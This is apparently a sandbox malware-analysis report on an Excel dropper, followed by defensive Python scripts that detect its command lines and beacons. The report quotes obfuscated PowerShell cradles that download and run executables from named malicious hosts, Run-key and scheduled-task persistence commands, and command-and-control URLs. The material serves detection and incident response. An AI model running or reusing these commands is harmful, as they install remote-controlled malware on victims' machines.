Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 260 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 260 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ps.exe TID: 884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 1976 Thread sleep time: -49965s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2780 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2780 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2312 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2772 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2232 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2712 Thread sleep time: -54723s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3028 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3028 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2716 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: q#"SOFTWARE\VMware, Inc.\VMware ToolsH
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: vmwareH
Source: powershell.exe, 0000000E.00000002.2115086772.00000000003B6000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: q&%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\H
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: VMWAREH
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIH
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: q#"SOFTWARE\VMware, Inc.\VMware Tools
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: qA"SOFTWARE\VMware, Inc.\VMware Tools
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp Binary or memory string: q87HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools\.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_004F1750 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 27_2_004F1750
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ps.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 27_2_00401179 SetUnhandledExceptionFilter, 27_2_00401179
Source: C:\Users\user\AppData\Local\Temp\ps.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Users\user\AppData\Roaming\svchost.exe Network Connect: 172.67.167.122 80
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\ps.exe Memory written: C:\Users\user\AppData\Local\Temp\ps.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\svchost.exe Memory written: C:\Users\user\AppData\Roaming\svchost.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'
Source: C:\Users\user\AppData\Local\Temp\ps.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
Source: C:\Users\user\AppData\Local\Temp\ps.exe Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe
Source: C:\Users\user\AppData\Local\Temp\ps.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Local\Temp\ps.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe Process created: unknown unknown
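The process-creation chain above is the part of this report a detection engineer turns into rules: a Net.WebClient download cradle run with a hidden window (-w 1 is -WindowStyle Hidden) whose tokens are broken up with backticks, cmd.exe carets and string concatenation, attrib +s +h to hide the dropped batch file, a scheduled task created from an XML file in %TEMP%, and a Run key pointing at an svchost.exe copy under %APPDATA%. The Python below is an added example, not part of the sandbox report or of the malware: it normalizes command lines the way a triage script would and applies one rule per behaviour. The command lines are copied from the entries above; the benign control line, the rule names and the thresholds are constructed for the example.

```python
import re

# Command lines as recorded in the "Process created" entries above, plus one
# constructed benign PowerShell invocation as a control.
SAMPLE_CMDLINES = [
    "powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')",
    "Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\\ps.exe');Start-Sleep 2; Start-Process $env:temp\\ps.exe;'",
    "'C:\\Windows\\system32\\attrib.exe' +s +h pd.bat",
    "'C:\\Windows\\System32\\schtasks.exe' /Create /TN 'Updates\\GvthaHtVzpRh' /XML 'C:\\Users\\user\\AppData\\Local\\Temp\\tmpEDF8.tmp'",
    "reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Microsoft /t REG_SZ /d C:\\Users\\user\\AppData\\Roaming\\svchost.exe",
    "powershell -NoProfile -Command Get-Date",  # constructed benign control
]

# Raw-string markers of token-breaking: a caret, a backtick inside a word,
# or two adjacent string literals joined with '+'.
OBFUSCATION_MARKERS = re.compile(r"\^|[A-Za-z]`[A-Za-z]|'\s*\+\s*'")
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
INDIRECT_MEMBER = re.compile(r"\.\('([A-Za-z_]\w*)'\)")


def normalize(cmdline: str) -> str:
    """Undo the cheap token-breaking seen in this sample.

    - cmd.exe carets (p^owersh^el^l) are escapes that cmd itself drops;
    - backticks inside bare words (nEw-oB`jecT) are PowerShell escapes that
      are no-ops for the letters used here (triage normalizer only: a real
      escape such as `n would be flattened as well);
    - 'Down'+'loadFile' is string concatenation, folded into one literal;
    - .('DownloadFile') is dynamic member access, rewritten as .DownloadFile.
    The result is lower-cased so the rules can be written case-insensitively.
    """
    s = cmdline.replace("^", "").replace("`", "")
    while True:  # fold nested concatenations until nothing changes
        folded = CONCAT.sub(r"'\1\2'", s)
        if folded == s:
            break
        s = folded
    s = INDIRECT_MEMBER.sub(r".\1", s)
    return s.lower()


# Rules run against the normalized command line (rule names are constructed).
RULES = [
    ("hidden_window_download_cradle",
     re.compile(r"powershell.*-w(indowstyle)?\s+(1|h(idden)?)\b.*net\.webclient.*downloadfile")),
    ("download_then_execute",
     re.compile(r"downloadfile.*start-process")),
    ("attrib_hide_system",
     re.compile(r"attrib.*\+[sh]\b.*\+[sh]\b")),
    ("schtasks_xml_from_temp",
     re.compile(r"schtasks.*/create.*/xml\s+'?[^']*\\temp\\")),
    ("run_key_points_to_appdata",
     re.compile(r"reg\s+add\s+hk[a-z_]*\\software\\microsoft\\windows\\currentversion\\run\b.*appdata")),
    ("system_binary_name_in_user_path",
     re.compile(r"\\(appdata|users|programdata|temp)\\.*\\(svchost|lsass|csrss|winlogon|explorer)\.exe")),
]


def scan(cmdlines):
    """Return [(cmdline, [rule names])] in input order.

    The obfuscation check runs on the raw string, because normalizing removes
    exactly the evidence it looks for; every other rule runs on the normalized
    form so that broken-up tokens cannot evade a plain substring match.
    """
    results = []
    for raw in cmdlines:
        hits = []
        if OBFUSCATION_MARKERS.search(raw):
            hits.append("obfuscated_token_syntax")
        norm = normalize(raw)
        hits.extend(name for name, rx in RULES if rx.search(norm))
        results.append((raw, hits))
    return results


if __name__ == "__main__":
    for raw, hits in scan(SAMPLE_CMDLINES):
        print(f"{hits or ['-']!s:60} {raw[:70]}")
```

Running the rules on the normalized form is the point: the report's "Obfuscated command line found" and "Suspicious powershell command line found" signatures fire on the same command line for different reasons, and a rule that looked for the literal string "New-Object" in the raw command line would miss both download cradles here.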

Language, Device and Operating System Detection:

Yara detected Obfuscated Powershell
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\Documents\pd.bat, type: DROPPED
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (30 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation (12 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation (6 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation (6 entries)
Source: C:\Users\user\AppData\Local\Temp\ps.exe Code function: 24_2_00AD079A GetUserNameA, 24_2_00AD079A
Source: C:\Users\user\AppData\Local\Temp\ps.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob
DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 is the SHA-1 thumbprint of the public DigiCert Global Root G2 CA. An AuthRoot write for a well-known public root by the same powershell.exe that performed the HTTPS downloads is consistent with the Windows automatic root update mechanism, so check what the Blob value contains before treating this entry as a rogue-root installation.

Stealing of Sensitive Information:

Searches for user specific document files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents (5 entries)
Source: C:\Windows\System32\attrib.exe Directory queried: C:\Users\user\Documents (2 entries)
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\user\Documents (2 entries)

Behavior Graph

Behavior Graph ID: 335896
Sample: 1e9b445cb987e5a1cb3d15e6fd6...
Startdate: 04/01/2021
Architecture: WINDOWS
Score: 100
Contacted host: cryptodual.net
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 16 other signatures

Process tree as drawn in the graph (the rendered graph itself is not reproduced; node annotations are given in brackets):

EXCEL.EXE  [Obfuscated command line found; Document exploit detected (process start blacklist hit)]
  cmd.exe
    powershell.exe
      cmd.exe  [Obfuscated command line found]
        cmd.exe  [Suspicious powershell command line found; Tries to download and execute files (via powershell)]
          powershell.exe  -> cryptodual.net 172.67.167.122:443 (CLOUDFLARENETUS, United States); dropped C:\Users\user\AppData\Local\Temp\ps.exe (PE32)
            ps.exe  [Queries sensitive video device information (via WMI, Win32_VideoController); Machine Learning detection for dropped file; Drops PE files with benign system names; Injects a PE file into a foreign processes]
                    dropped C:\Users\user\AppData\...\GvthaHtVzpRh.exe (PE32), C:\Users\user\AppData\Local\...\tmpEDF8.tmp (XML)
              ps.exe  dropped C:\Users\user\AppData\Roaming\svchost.exe (PE32)
                svchost.exe  [Queries sensitive video device information (via WMI, Win32_VideoController); Machine Learning detection for dropped file; Injects a PE file into a foreign processes]
                cmd.exe
                  reg.exe
              schtasks.exe
        mode.com  [Queries sensitive video device information (via WMI, Win32_VideoController)]
        cmd.exe
  cmd.exe  [Obfuscated command line found]
    powershell.exe  -> cutt.ly 172.67.8.238:443 (CLOUDFLARENETUS, United States); 37.46.150.139:80 (IWAYCH, Moldova Republic of); dropped C:\Users\user\Documents\pd.bat (ASCII)
  cmd.exe
    powershell.exe  [Queries sensitive video device information (via WMI, Win32_VideoController); Powershell drops PE file]
  2 other processes
    powershell.exe
      attrib.exe
    powershell.exe
svchost.exe  (started independently of the Excel chain, 2 instances)

Contacted Public IPs

IP              Domain   Country              ASN    ASN Name         Malicious
172.67.8.238    unknown  United States        13335  CLOUDFLARENETUS  true
172.67.167.122  unknown  United States        13335  CLOUDFLARENETUS  true
37.46.150.139   unknown  Moldova Republic of  8758   IWAYCH           false

Contacted Domains

Name IP Active
cutt.ly 172.67.8.238 true
cryptodual.net 172.67.167.122 true

Contacted URLs

Name: http://cryptodual.net/cc/gate.php
  Malicious: true | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
Name: http://cryptodual.net/cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command
  Malicious: true | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
Name: http://37.46.150.139/bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat
  Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
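The two cryptodual.net URLs are what the "Found C&C like URL pattern" signature refers to: a bare gate.php check-in and a check_command.php poll with act=get_command, keyed on an HWID that has the shape of the MachineGuid value ps.exe reads from HKLM\SOFTWARE\Microsoft\Cryptography (see the Language, Device and Operating System Detection section). The Python below is an added example, not part of the report: it scans constructed proxy-log lines for this pattern, extracts the HWID so it can be matched against a host's MachineGuid during incident response, and flags the batch script fetched from a bare IP address. The three URLs are the ones listed above; the timestamps, client address, status codes and the example.com control line are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy-log lines: "<timestamp> <client> <method> <url> <status>".
# The three URLs are the report's "Contacted URLs"; everything else is made up.
SAMPLE_PROXY_LOG = """\
2021-01-04T10:12:01Z 10.0.0.15 GET http://37.46.150.139/bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat 200
2021-01-04T10:12:09Z 10.0.0.15 GET http://cryptodual.net/cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command 200
2021-01-04T10:12:10Z 10.0.0.15 POST http://cryptodual.net/cc/gate.php 200
2021-01-04T10:12:30Z 10.0.0.15 GET http://example.com/index.html 200
"""

# MachineGuid-shaped value, with or without braces, any case.
GUID = re.compile(r"^\{?[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?$", re.I)
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta")


def classify_url(url):
    """Return (rule names, hwid or None) for a single URL.

    Rule names are constructed for this example; the path and parameter
    names come from the URLs in the report.
    """
    parts = urlsplit(url)
    path = parts.path.lower()
    basename = path.rsplit("/", 1)[-1]
    query = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    rules, hwid = [], None

    # Parameter-less check-in endpoint with the classic "gate" name.
    if basename == "gate.php":
        rules.append("gate_php_checkin")

    # Command poll: act=get_command plus a host id shaped like a MachineGuid.
    if basename == "check_command.php" and query.get("act") == "get_command":
        candidate = query.get("hwid")
        if candidate and GUID.match(candidate):
            rules.append("get_command_beacon")
            hwid = candidate

    # Script fetched straight from an IPv4 literal, no hostname involved.
    if IPV4.match(parts.hostname or "") and path.endswith(SCRIPT_EXT):
        rules.append("script_from_bare_ip")

    return rules, hwid


def scan(log_text):
    """Return one finding dict per log line that matched at least one rule."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status = line.split()
        rules, hwid = classify_url(url)
        if rules:
            findings.append({"ts": ts, "client": client, "method": method,
                             "url": url, "status": status,
                             "rules": rules, "hwid": hwid})
    return findings


def hwid_matches_machine_guid(hwid, machine_guid):
    """True if a beacon HWID equals a host's MachineGuid, ignoring braces and case.

    The registry value has no braces and Windows tooling prints it in
    lower case; the beacon wraps it in braces, so normalize both sides.
    """
    def norm(g):
        return g.strip("{}").lower()
    return norm(hwid) == norm(machine_guid)


if __name__ == "__main__":
    for f in scan(SAMPLE_PROXY_LOG):
        print(f["client"], f["rules"], f["hwid"] or "", f["url"])
```

Extracting the HWID is what makes this more than a URL blocklist: the same GUID in HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid on an endpoint confirms which host the beacon came from even when the proxy only recorded a NAT address, and a second HWID on the same URL pattern is a second infected host.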